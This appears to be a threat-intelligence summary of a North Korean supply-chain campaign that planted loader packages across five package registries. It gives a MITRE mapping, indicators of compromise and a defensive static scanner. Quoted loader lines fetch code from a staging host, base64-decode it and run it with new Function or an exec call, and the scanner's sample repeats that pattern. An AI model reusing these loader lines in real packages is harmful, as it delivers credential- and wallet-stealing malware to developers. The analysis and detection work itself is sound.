North Korea’s Contagious Interview Campaign Spreads Across 5…

Contagious Interview published malicious packages across npm, PyPI, Go Modules, crates.io, and Packagist that impersonated legitimate developer tooling and acted as staged loaders to fetch and execute second-stage payloads. The cluster includes a Windows-heavy variant (license-utils-kit) with full RAT capabilities and leverages infrastructure such as apachelicense[.]vercel[.]app and 66[.]45[.]225[.]94 for delivery. #ContagiousInterview #license-utils-kit

Keypoints

  • Threat actors operating under aliases like golangorg, aokisasakidev, and maxcointech1010 published over a thousand malicious packages across five major open-source registries to extend a supply-chain loader playbook.
  • Most packages implement a consistent staged-loader workflow: contact a staging endpoint, parse a JSON downloadUrl, download a ZIP (e.g., ecw_update.zip), extract to a temp directory, and execute platform-specific payloads.
  • Malicious functionality is hidden behind plausible library APIs (e.g., logger methods, license lookup helpers, update/check functions), making casual review less likely to detect the malware.
  • Npm packages differ by fetching base64-encoded JavaScript and executing it in memory, while Python, Go, Rust, and PHP samples download and extract ZIP archives or spawn interpreters.
  • The license-utils-kit Windows variant contains a full RAT with remote shell, keylogging, browser and wallet theft, encrypted archiving, file exfiltration, and AnyDesk deployment capabilities.
  • Defensive actions included reporting and takedown requests to registries and GitHub; recommendations emphasize pinning dependencies, sandboxing packages, preserving registry metadata for faster clustering, and monitoring for remote-download/update behaviors.
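The staged-loader workflow in the keypoints above leaves recognisable traces in package source (base64 decode feeding a dynamic-execution call, a `downloadUrl` field, ZIP extraction into a temp directory, Google Drive direct-download rewriting, and the staging hosts and artifact names from the IoC list). The following static scanner is an added example written for this page, not Socket's own tooling; its rule weights, threshold and the two sample snippets are constructed, and the loader snippet is only scanned as text, never executed.

```python
"""Static heuristics for the staged-loader workflow summarized above.
Added example, not Socket's tooling: run it over an unpacked package before
installing. Rules, weights, threshold and the samples are constructed."""
import re
from pathlib import Path

# Each rule: (name, patterns that must ALL match, weight). Hostnames/artifacts
# come from the IoC list; code patterns mirror the quoted npm/Go loader lines.
RULES = [
    ("base64-decode", [r"Buffer\.from\([^)]*['\"]base64['\"]\)|b64decode|base64\.StdEncoding"], 2),
    ("dynamic-exec", [r"new\s+Function\s*\(|\beval\s*\(|\bexec\s*\(|exec\.Command\("], 2),
    ("download-url-json", [r"downloadUrl"], 2),
    ("zip-to-temp", [r"zipfile|adm-zip|unzip|archive/zip", r"\btmp\b|\btemp\b|tmpdir|TempDir"], 1),
    ("drive-link-rewrite", [r"drive\.usercontent\.google\.com/download\?id="], 2),
    ("known-staging-host", [r"apachelicense\.vercel\.app|logkit\.onrender\.com|ngrok-free\.vercel\.app|66\.45\.225\.94"], 3),
    ("known-artifact", [r"ecw_update\.zip|systemd-resolved|com\.apple\.systemevents|start\.pypy\.exe"], 2),
]
THRESHOLD = 4  # constructed cutoff: one base64 or exec call alone is common in benign code

def scan_source(text: str) -> dict:
    """Score one source file's text against RULES."""
    hits = [n for n, pats, _ in RULES if all(re.search(p, text, re.I) for p in pats)]
    score = sum(w for n, _, w in RULES if n in hits)
    return {"hits": hits, "score": score, "suspicious": score >= THRESHOLD}

def scan_package(root: str) -> list:
    """Walk an unpacked package and return (path, hits, score) for files over the threshold."""
    exts = {".js", ".mjs", ".cjs", ".py", ".go", ".rs", ".php"}
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix in exts:
            r = scan_source(p.read_text(errors="ignore"))
            if r["suspicious"]:
                findings.append((str(p), r["hits"], r["score"]))
    return findings

# Constructed samples: a loader shaped like the quoted npm snippet (scanned as text
# only, never executed) and a benign logger that should not trip the rules.
LOADER_SAMPLE = """
const res = await fetch("https://apachelicense.vercel.app/getAddress?platform=" + process.platform, {method: "POST"});
const {downloadUrl, encodedMessage} = await res.json();
const decodedCode = Buffer.from(encodedMessage, 'base64').toString('utf8');
const debugFunction = new Function('require', decodedCode)(require);
"""
BENIGN_SAMPLE = """
function debug(ns) { return (...args) => console.error(`[${ns}]`, ...args); }
module.exports = debug;
"""
```

`scan_package("path/to/unpacked/pkg")` applies the same scoring to every source file in a directory; the threshold deliberately ignores a lone base64 or exec call so ordinary libraries are not flagged.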

MITRE Techniques

  • [T1195.001] Compromise Software Dependencies and Development Tools – Actor published malicious packages across registries to gain access (‘…published malicious packages across five open source ecosystems’).
  • [T1608.001] Stage Capabilities: Upload Malware – Loaders retrieve and deliver second-stage payloads via archives (‘…fetch ZIP archives such as ecw_update.zip, and deliver platform-specific second-stage payloads.’).
  • [T1036.005] Masquerading: Match Legitimate Resource Name or Location – Packages impersonated developer tooling and libraries to appear benign (‘…designed to impersonate legitimate developer tooling (such as debug, debug-logfmt, pino-debug, baraka, license…).’).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – Npm packages decode and execute remote JavaScript in memory using new Function (‘const decodedCode = Buffer.from(encodedMessage, 'base64').toString('utf8'); const debugFunction = new Function('require', decodedCode)(require);’).
  • [T1059.006] Command and Scripting Interpreter: Python – Several loaders spawn Python interpreters to execute downloaded code (‘cmd := exec.Command(pyPath, "-c", string([]byte(decodedStr))) // Executes threat actor-supplied decoded code’).
  • [T1027.013] Obfuscated Files or Information: Encrypted/Encoded File – Windows variant bundled obfuscated components that hide malicious capabilities (‘…bundles obfuscated components that, once deobfuscated, reveal browser theft, wallet theft…’).
  • [T1140] Deobfuscate/Decode Files or Information – Attack chain includes decoding/deobfuscation steps to reveal payloads and modules (‘once deobfuscated, reveal browser theft, wallet theft, sensitive-file collection…’).
  • [T1105] Ingress Tool Transfer – Loaders download archives and additional payloads from staging infrastructure and cloud links (‘download a zip archive, extract it into a temp directory, find a platform-specific payload, and execute it’).
  • [T1071.001] Application Layer Protocol: Web Protocols – Packages contact staging endpoints over HTTP(S) to retrieve JSON with downloadUrl (‘contact https://apachelicense.vercel.app/getAddress?platform= with an HTTP POST’).
  • [T1005] Data from Local System – Primary objective is credential and browser data theft from compromised hosts (‘…focused on stealing credentials, browser data, password-manager contents, and cryptocurrency wallet data.’).
  • [T1082] System Information Discovery – Payloads use platform-specific artifact names and checks indicating system-aware behavior (‘…Unix-like payload names such as com.apple.systemevents and systemd-resolved.’).
  • [T1083] File and Directory Discovery – Loaders extract archives into temp directories and search for platform payloads (‘…download a ZIP archive, extract it into a temp directory, find a platform-specific payload, and execute it.’).
  • [T1217] Browser Information Discovery – Malware includes capabilities to locate and collect browser artifacts and related data (‘…browser theft, wallet theft, sensitive-file collection…’).
  • [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – RAT aims to harvest credentials stored in browsers (‘…stealing credentials, browser data, password-manager contents…’).
  • [T1555.005] Credentials from Password Stores: Password Managers – Operation targets password-manager contents for credential theft (‘…stealing credentials, browser data, password-manager contents…’).
  • [T1119] Automated Collection – Command handlers and automated routines collect and prepare data for exfiltration (‘self.command_handlers = { … 4: self.run_browser_stealer, 8: self.upload_sensitive_files, 9: self.create_encrypted_archive … }’).
  • [T1041] Exfiltration Over C2 Channel – Collected data and payload results are exfiltrated over C2 and delivery channels controlled by the actor (implied by staged loaders and the RAT exfiltration workflow; see ‘deliver platform-specific second-stage payloads’).
  • [T1657] Financial Theft – Malware targets cryptocurrency wallets and related financial data (‘…stealing … cryptocurrency wallet data.’).

Indicators of Compromise

  • [Malicious Packages] Registry-distributed loader packages – dev-log-core, logger-base, and other packages such as logutilkit and license-utils-kit (and many more across npm, PyPI, Go, crates.io, Packagist).
  • [Domains / C2 Endpoints] Staging and delivery infrastructure – apachelicense[.]vercel[.]app, logkit.onrender[.]com, ngrok-free[.]vercel[.]app (and other vercel/onrender hostnames observed).
  • [IP Addresses] Secondary infrastructure cluster – 66[.]45[.]225[.]94 (used by the Windows-heavy variant), and other hosting endpoints observed.
  • [File Hashes (SHA-256)] Second-stage payload evidence – 9a541dffb7fc18dc71dbc8523ec6c3a71c224ffeb518ae3a8d7d16377aebee58 (Linux), bb2a89001410fa5a11dea6477d4f5573130261badc67fe952cfad1174c2f0edd (macOS), and 7c5adef4b5aee7a4aa6e795a86f8b7d601618c3bc003f1326ca57d03ec7d6524 (Windows).
  • [GitHub Accounts] Malicious or persona GitHub profiles – https://github[.]com/golangorg, https://github[.]com/aokisasakidev (and supporting accounts like maxcointech1010/maxcointech0000).
  • [Emails] Maintainer/contact identifiers – aokisasaki1122@gmail[.]com, shiningup1996@gmail[.]com (linked to personas and package metadata).
  • [Filenames / Artifacts] Delivery and payload artifacts – ecw_update.zip, systemd-resolved, com.apple.systemevents, start.pypy.exe (and other platform-specific payload names).
  • [Cloud Delivery Patterns] Google Drive-based delivery – drive[.]google[.]com/file/d/, drive[.]usercontent[.]google[.]com/download?id=&export=download&confirm=t (used by loaders rewriting sharing links to direct-download form).
  • [Temporary Directory Names] Extraction and temp artifacts – 410BB449A-72C6-4500-9765-ACD04JBV827V32V (used as the extraction directory), and temp script/executable names like a91c2b7f-9d5f-487e-9e6f-63d1a42bf3db.tmp.


Read more: https://socket.dev/blog/contagious-interview-campaign-spreads-across-5-ecosystems